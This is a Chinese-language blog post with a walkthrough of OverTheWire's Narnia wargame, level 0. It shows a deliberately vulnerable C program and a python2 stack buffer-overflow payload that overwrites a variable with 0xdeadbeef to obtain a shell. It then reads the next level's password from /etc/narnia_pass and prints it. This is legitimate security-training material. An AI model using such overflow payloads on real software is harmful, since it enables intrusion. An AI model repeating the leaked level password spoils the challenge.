2019-10-02-OverTheWire narnia.md

layout	title	date	categories	tags	series	series_index	comments	mathjax	copyrights
post	Narnia	2019-10-02 00:00:00 +0800	安全	game	OverTheWire	3	true	true	原创 未完待续

https://overthewire.org/wargames/narnia/

每关使用 ssh 连接

ssh -p 2226 [email protected]

Level 0–>Level 1

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

可以看到，有一个大小为 20 的 buf，我们需要通过输入溢出 buf 来覆盖 val 的值。

我们首先做一个简单的尝试：

$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAABCDE
buf: AAAAAAAAAAAAAAAAAAAABCDE
val: 0x45444342
WAY OFF!!!!

值得注意的是，val 的值为 0x45444342，即 EDCB。

/narnia$ python2 -c 'print "A"*20 + "\xef\xbe\xad\xde\x80"'
AAAAAAAAAAAAAAAAAAAAﾭހ
/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAﾭހ
buf: AAAAAAAAAAAAAAAAAAAAﾭ�
val: 0xdeadbeef
$ cat /etc/narnia_pass/narnia1
eaa6AjYMBB